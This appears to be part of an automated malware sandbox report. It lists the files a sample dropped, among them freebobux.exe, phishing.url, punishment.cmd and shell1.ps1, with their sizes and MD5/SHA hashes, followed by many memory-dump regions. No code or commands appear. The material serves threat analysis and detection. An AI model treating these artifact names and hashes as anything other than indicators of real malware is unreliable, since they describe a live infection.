MD591eb9128663e8d3943a556868456f787
SHA1b046c52869c0ddcaec3de0cf04a0349dfa3bd9c3
SHA256f5448c8e4f08fa58cb2425ab61705ade8d56a6947124dea957941e5f37356cd3
SHA512c0d7196f852fc0434b2d111e3cf11c9fd2cb27485132b7ce22513fe3c87d5ad0767b8f35c36948556bce27dcc1b4aa21fbb21414637f13071d45f18c9ae32bf6
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\export\3\IMG_5343.MP4Filesize
1.7MB
MD5180722cbf398f04e781f85e0155fa197
SHA177183c68a012f869c1f15ba91d959d663f23232d
SHA25694e998cedbbb024b3c7022492db05910e868bb0683d963236163c984aa88e02a
SHA512bbece30927da877f7c103e0742466cda4b232fb69b2bf8ebe66a13bf625f5a66e131716b3a243bb5e25d89bd4bde0b004da8dd76200204c67a3d641e8087451d
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\export\spread.cmdFilesize
104B
MD57a71a7e1d8c6edf926a0437e49ae4319
SHA1d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1
SHA256e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae
SHA51296a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\f3cb220f1aaa32ca310586e5f62dcab1.packFilesize
894KB
MD534a66c4ec94dbdc4f84b4e6768aebf4e
SHA1d6f58b372433ad5e49a20c85466f9fb3627abff2
SHA256fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb
SHA5124db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\freebobux.exeFilesize
779KB
MD5794b00893a1b95ade9379710821ac1a4
SHA185c7b2c351700457e3d6a21032dfd971ccb9b09d
SHA2565ac42d75e244d33856971120a25bd77f2c0712177384dfa61fb90c0e7790d34c
SHA5123774d4aed0cce7ed257d31a2bb65dda585d142c3c527dc32b40064d22d9d298dd183c52603561c9c1e96dd02737a8b2237c433cf7a74dccb0a25191446d60017
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\handler.cmdFilesize
225B
MD5c1e3b759a113d2e67d87468b079da7dc
SHA13b280e1c66c7008b4f123b3be3aeb635d4ab17c3
SHA256b434261414e7c75437e8c47aba9a5b73fcb8cffbf0870998f50edc46084d1da5
SHA51220a1494027a5cf10f4cc71722a7a4e685fc7714ba08598dd150c545f644e139ddb200fb0b5517f5491a70d8644e90c8f60e8c457bc5d8eb0bb451120b40b8447
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\helper.vbsFilesize
26B
MD57a97744bc621cf22890e2aebd10fd5c8
SHA11147c8df448fe73da6aa6c396c5c53457df87620
SHA256153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709
SHA51289c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\install.exeFilesize
878B
MD51e800303c5590d814552548aaeca5ee1
SHA11f57986f6794cd13251e2c8e17d9e00791209176
SHA2567d815f37d808bc350a3c49810491d5df0382409347ebae7a3064a535d485c534
SHA512138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\jaffa.exeFilesize
512KB
MD56b1b6c081780047b333e1e9fb8e473b6
SHA18c31629bd4a4ee29b7ec1e1487fed087f5e4b1de
SHA256e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac
SHA512022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\jkka.exeFilesize
1002KB
MD542e4b26357361615b96afde69a5f0cc3
SHA135346fe0787f14236296b469bf2fed5c24a1a53d
SHA256e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb
SHA512fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\lupa.pngFilesize
5KB
MD50a9d964a322ad35b99505a03e962e39a
SHA11b5fed1e04fc22dea2ae82a07c4cfd25b043fc51
SHA25648cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b
SHA512c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\phishing.urlFilesize
1KB
MD56f62e208aad51e2d5ef2a12427b36948
SHA1453eaf5afef9e82e2f50e0158e94cc1679b21bea
SHA256cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b
SHA512f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\punishment.cmdFilesize
200B
MD5c8d2a5c6fe3c8efa8afc51e12cf9d864
SHA15d94a4725a5eebb81cfa76100eb6e226fa583201
SHA256c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb
SHA51259e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\punishment.vbsFilesize
97B
MD5c38e912e4423834aba9e3ce5cd93114b
SHA1eab7bf293738d535bb447e375811d6daccc37a11
SHA256c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1
SHA5125df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\readme.mdFilesize
167B
MD55ae93516939cd47ccc5e99aa9429067c
SHA13579225f7f8c066994d11b57c5f5f14f829a497f
SHA256f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589
SHA512c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\regmess.exeFilesize
536KB
MD55c4d7e6d02ec8f694348440b4b67cc45
SHA1be708ac13886757024dd2288ddd30221aed2ed86
SHA256faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018
SHA51271f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\scary.exeFilesize
3.1MB
MD597cd39b10b06129cb419a72e1a1827b0
SHA1d05b2d7cfdf8b12746ffc7a59be36634852390bd
SHA2566bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc
SHA512266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\screenshot.pngFilesize
266KB
MD5de8ddeeb9df6efab37b7f52fe5fb4988
SHA161f3aac4681b94928bc4c2ddb0f405b08a8ade46
SHA25647b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159
SHA5126f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\selfaware.exeFilesize
797KB
MD55cb9ba5071d1e96c85c7f79254e54908
SHA13470b95d97fb7f1720be55e033d479d6623aede2
SHA25653b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5
SHA51270d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\shell1.ps1Filesize
356B
MD529a3efd5dbe76b1c4bbc2964f9e15b08
SHA102c2fc64c69ab63a7a8e9f0d5d55fe268c36c879
SHA256923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129
SHA512dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\spinner.gifFilesize
44KB
MD5324f8384507560259aaa182eb0c7f94a
SHA13b86304767e541ddb32fdda2e9996d8dbeca16ed
SHA256f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5
SHA512cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\stopwerfault.cmdFilesize
42B
MD57eacd2dee5a6b83d43029bf620a0cafa
SHA19d4561fa2ccf14e05265c288d8e7caa7a3df7354
SHA256d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b
SHA512fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\the.exeFilesize
764KB
MD5e45dcabc64578b3cf27c5338f26862f1
SHA11c376ec14025cabe24672620dcb941684fbd42b3
SHA256b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455
SHA5125d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\web.htmFilesize
367B
MD5f63c0947a1ee32cfb4c31fcbc7af3504
SHA1ee46256901fa8a5c80e4a859f0f486e84c61cbaa
SHA256bfe43062464da1f859ea3c2adace8ff251e72d840b32ef78c15b64c99f56d541
SHA5121f8666abfd3e5543710c6d2c5fb8c506d10d9f0f0306b25ba81176aa595a5afa8c288b522832f8ffe0a12873eaf2c2a0eff49ce4caa88400e8db7a8870a42184
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\web2.htmFilesize
684B
MD51fc6bb77ac7589f2bffeaf09bcf7a0cf
SHA1028bdda6b433e79e9fbf021b94b89251ab840131
SHA2565d0147dc2b94b493d34efd322da66921f2d3d2b1cc7b0226ac1d494f99a933a1
SHA5126ef21162b85975fdd58628dcab0d610ce7acd8ab36820a09e9e8eb1e6b2d76060ed4ad2b48bdbe1e212ec84abb309e124a752e078f6747893a83562824ea6af6
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\web3.htmFilesize
904KB
MD59e118cccfa09666b2e1ab6e14d99183e
SHA1e6d3ab646aa941f0ca607f12b968c1e45c1164b4
SHA256d175dc88764d5ea95f19148d52fde1262125fedb41937dc2134f6f787ae26942
SHA512da02267196129ebeaa4c5ff74d63351260964fa8535343e3f10cd3fcf8f0e3d0a87c61adb84ec68b4770d3ef86535d11e4eacf6437c5f5fbe52c34aa6e07bd04
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs.jsFilesize
7KB
MD5eed22db39cada05154db92cdbb46896b
SHA1e4e590dcee991545c5f179aa7d9a92f615d92d73
SHA25697b24df81d6f14c2ec2d2f5234f5e083efb562f86f49afafa30ecc666c8fa5a4
SHA5123ddc042b2b16b513585169e51a6c21aa92a9e8b35573e2951b4fa5f2b2131bb4f634ed36238d102cbd6b552e76cdd7a16558bb56a968fef9d9a6847d68ace869
-
C:\Users\Admin\Pictures\0ED8kn5cnmOyeZv2DQ8eB5il.exeFilesize
6.4MB
MD50e0938f8a7266056305bfedda7e1e78a
SHA12b4aa419957936fa6c6a2afbadb6bc30c1c4895d
SHA256b542adb1e853812925a1b5a1d1feac30125f05a9d7d0b1adce9ef4c6354c1066
SHA5124c430686f61843fc17c67fa8e78357f576620937137b7153bd2da4cc4f73a104130c221f24fb8060a767eac178bb6b319763b964eeffaa339b73cce444286490
-
C:\Users\Admin\Pictures\dkFVZlmtLqTxxrtOi9FElXnO.exeFilesize
12.3MB
MD5acadbe83c09a7a9b8213a662eda12e93
SHA126a6e55076bc0602ff9060ac529528f3fc631986
SHA25642dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944
SHA512a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f
-
C:\Users\Admin\Pictures\eLOyJkYRBZrXsLNa5scWY7nr.exeFilesize
7.3MB
MD508063da816c5db77ce64807c4ec2f7e8
SHA161ded712f36458ba6ffcec37edbf65d5927d2d92
SHA256dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e
SHA512df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0
-
C:\Users\Admin\Pictures\pKObCuHpjwoZZM8nL5N17RI3.exeFilesize
405KB
MD5ef65292d26c79999f9cd88fc202e257e
SHA1bb1022e9d3d345f14db1f7e431d4d63259fa3ac2
SHA2564bd44fc79eff569312def70fb850c7f168e84d039f4d1d23b7a4927338476222
SHA5127df62adbecb10d5894741e85ee99df64949eb8a8300e352a5e9d8253b65ea58971f10d10a1f7a8dc0b99bfc87ab8ee511499a6b740cc996f8ec64e312209d02a
-
C:\Users\Admin\Pictures\qjnar5mhQPzpks9OpNlu8jqr.exeFilesize
1.5MB
MD5cd4acedefa9ab5c7dccac667f91cef13
SHA1bff5ce910f75aeae37583a63828a00ae5f02c4e7
SHA256dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c
SHA51206fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1
-
C:\Users\Admin\Pictures\zfEDjcL7ZB8wkAtrpEbv8iJ6.exeFilesize
7KB
MD577f762f953163d7639dff697104e1470
SHA1ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
\??\pipe\LOCAL\crashpad_3976_YBCCECWIJGVEEQJPMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/856-322-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-264-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-320-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-328-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-318-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-303-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-330-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-293-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-287-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-285-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-279-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-291-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-274-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-272-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-297-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-239-0x0000000005F40000-0x0000000006490000-memory.dmpFilesize
5.3MB
-
memory/856-266-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-283-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-258-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-256-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-252-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-249-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-260-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-254-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-250-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-299-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-301-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-295-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-3345-0x000000000B8B0000-0x000000000BF90000-memory.dmpFilesize
6.9MB
-
memory/856-247-0x0000000006A40000-0x0000000006F8E000-memory.dmpFilesize
5.3MB
-
memory/856-263-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-289-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-270-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-268-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-276-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/856-280-0x0000000006A40000-0x0000000006F89000-memory.dmpFilesize
5.3MB
-
memory/1300-32-0x00000000750E0000-0x0000000075890000-memory.dmpFilesize
7.7MB
-
memory/1300-37-0x0000000004BE0000-0x0000000004C72000-memory.dmpFilesize
584KB
-
memory/1300-121-0x00000000750E0000-0x0000000075890000-memory.dmpFilesize
7.7MB
-
memory/1300-54-0x0000000004D20000-0x0000000004D2A000-memory.dmpFilesize
40KB
-
memory/1300-47-0x0000000002770000-0x0000000002794000-memory.dmpFilesize
144KB
-
memory/1300-49-0x00000000750E0000-0x0000000075890000-memory.dmpFilesize
7.7MB
-
memory/1300-31-0x0000000000350000-0x000000000036C000-memory.dmpFilesize
112KB
-
memory/2516-3363-0x0000000002C30000-0x0000000002C54000-memory.dmpFilesize
144KB
-
memory/2652-4270-0x0000020E31B00000-0x0000020E31B12000-memory.dmpFilesize
72KB
-
memory/2652-4275-0x0000020E32300000-0x0000020E32376000-memory.dmpFilesize
472KB
-
memory/2652-4276-0x0000020E324C0000-0x0000020E324DE000-memory.dmpFilesize
120KB
-
memory/2652-3639-0x0000020E167A0000-0x0000020E173F2000-memory.dmpFilesize
12.3MB
-
memory/2652-4271-0x0000020E31AF0000-0x0000020E31AFA000-memory.dmpFilesize
40KB
-
memory/2804-30-0x0000000017E50000-0x0000000017E8C000-memory.dmpFilesize
240KB
-
memory/2804-2-0x0000000002FF0000-0x0000000003014000-memory.dmpFilesize
144KB
-
memory/2804-3-0x00000000750E0000-0x0000000075890000-memory.dmpFilesize
7.7MB
-
memory/2804-3474-0x00000000750EE000-0x00000000750EF000-memory.dmpFilesize
4KB
-
memory/2804-29-0x0000000017DF0000-0x0000000017E02000-memory.dmpFilesize
72KB
-
memory/2804-0-0x00000000750EE000-0x00000000750EF000-memory.dmpFilesize
4KB
-
memory/2804-1-0x0000000000BE0000-0x0000000000C3E000-memory.dmpFilesize
376KB
-
memory/2804-3484-0x00000000750E0000-0x0000000075890000-memory.dmpFilesize
7.7MB
-
memory/2804-4-0x0000000005C90000-0x0000000006234000-memory.dmpFilesize
5.6MB
-
memory/2804-96-0x00000000750E0000-0x0000000075890000-memory.dmpFilesize
7.7MB
-
memory/3612-3683-0x0000000006250000-0x000000000626A000-memory.dmpFilesize
104KB
-
memory/3612-3684-0x00000000062A0000-0x00000000062C2000-memory.dmpFilesize
136KB
-
memory/3612-3665-0x0000000002420000-0x0000000002456000-memory.dmpFilesize
216KB
-
memory/3612-3666-0x0000000005070000-0x0000000005698000-memory.dmpFilesize
6.2MB
-
memory/3612-3667-0x0000000004C10000-0x0000000004C32000-memory.dmpFilesize
136KB
-
memory/3612-3669-0x0000000004E50000-0x0000000004EB6000-memory.dmpFilesize
408KB
-
memory/3612-3668-0x0000000004CB0000-0x0000000004D16000-memory.dmpFilesize
408KB
-
memory/3612-3679-0x00000000057A0000-0x0000000005AF4000-memory.dmpFilesize
3.3MB
-
memory/3612-3680-0x0000000005D50000-0x0000000005D6E000-memory.dmpFilesize
120KB
-
memory/3612-3681-0x0000000005D90000-0x0000000005DDC000-memory.dmpFilesize
304KB
-
memory/3612-3682-0x00000000062D0000-0x0000000006366000-memory.dmpFilesize
600KB
-
memory/4236-3816-0x00000000047F0000-0x0000000004B44000-memory.dmpFilesize
3.3MB
-
memory/4480-1137-0x0000026C6A220000-0x0000026C6B220000-memory.dmpFilesize
16.0MB
-
memory/4772-3763-0x0000000000400000-0x000000000045C000-memory.dmpFilesize
368KB
-
memory/4912-3607-0x0000000004450000-0x0000000004456000-memory.dmpFilesize
24KB
-
memory/4912-3663-0x0000000008D60000-0x0000000008D7A000-memory.dmpFilesize
104KB
-
memory/4912-3603-0x0000000008930000-0x0000000008BF2000-memory.dmpFilesize
2.8MB
-
memory/4912-3579-0x0000000004AA0000-0x0000000004B3C000-memory.dmpFilesize
624KB
-
memory/4912-3578-0x0000000000A20000-0x0000000000A8A000-memory.dmpFilesize
424KB
-
memory/4912-3664-0x0000000008D80000-0x0000000008D86000-memory.dmpFilesize
24KB
-
memory/5624-3701-0x00000000067B0000-0x00000000067FC000-memory.dmpFilesize
304KB
-
memory/5624-3700-0x00000000061A0000-0x00000000064F4000-memory.dmpFilesize
3.3MB
-
memory/5788-3463-0x0000000000F00000-0x0000000000F8A000-memory.dmpFilesize
552KB
-
memory/5972-3407-0x0000000000BB0000-0x00000000021D7000-memory.dmpFilesize
22.2MB
-
memory/5972-3455-0x0000000000BB0000-0x00000000021D7000-memory.dmpFilesize
22.2MB
-
memory/6056-3710-0x0000000004CA0000-0x0000000004FF4000-memory.dmpFilesize
3.3MB
-
memory/6056-3715-0x00000000056F0000-0x000000000573C000-memory.dmpFilesize
304KB
-
memory/6200-3507-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/6592-3473-0x000000001C200000-0x000000001C2B2000-memory.dmpFilesize
712KB
-
memory/6592-3472-0x000000001C0F0000-0x000000001C140000-memory.dmpFilesize
320KB
-
memory/7020-3487-0x0000020D3AAB0000-0x0000020D3AAD2000-memory.dmpFilesize
136KB
-
memory/7020-3504-0x0000020D3AB10000-0x0000020D3AB1C000-memory.dmpFilesize
48KB
-
memory/7020-3505-0x0000020D52F80000-0x0000020D52FDC000-memory.dmpFilesize
368KB
-
memory/7036-3462-0x00000000009E0000-0x0000000000D04000-memory.dmpFilesize
3.1MB
-
memory/7060-3616-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
-
memory/7060-3754-0x0000000140000000-0x000000014159C000-memory.dmpFilesize
21.6MB
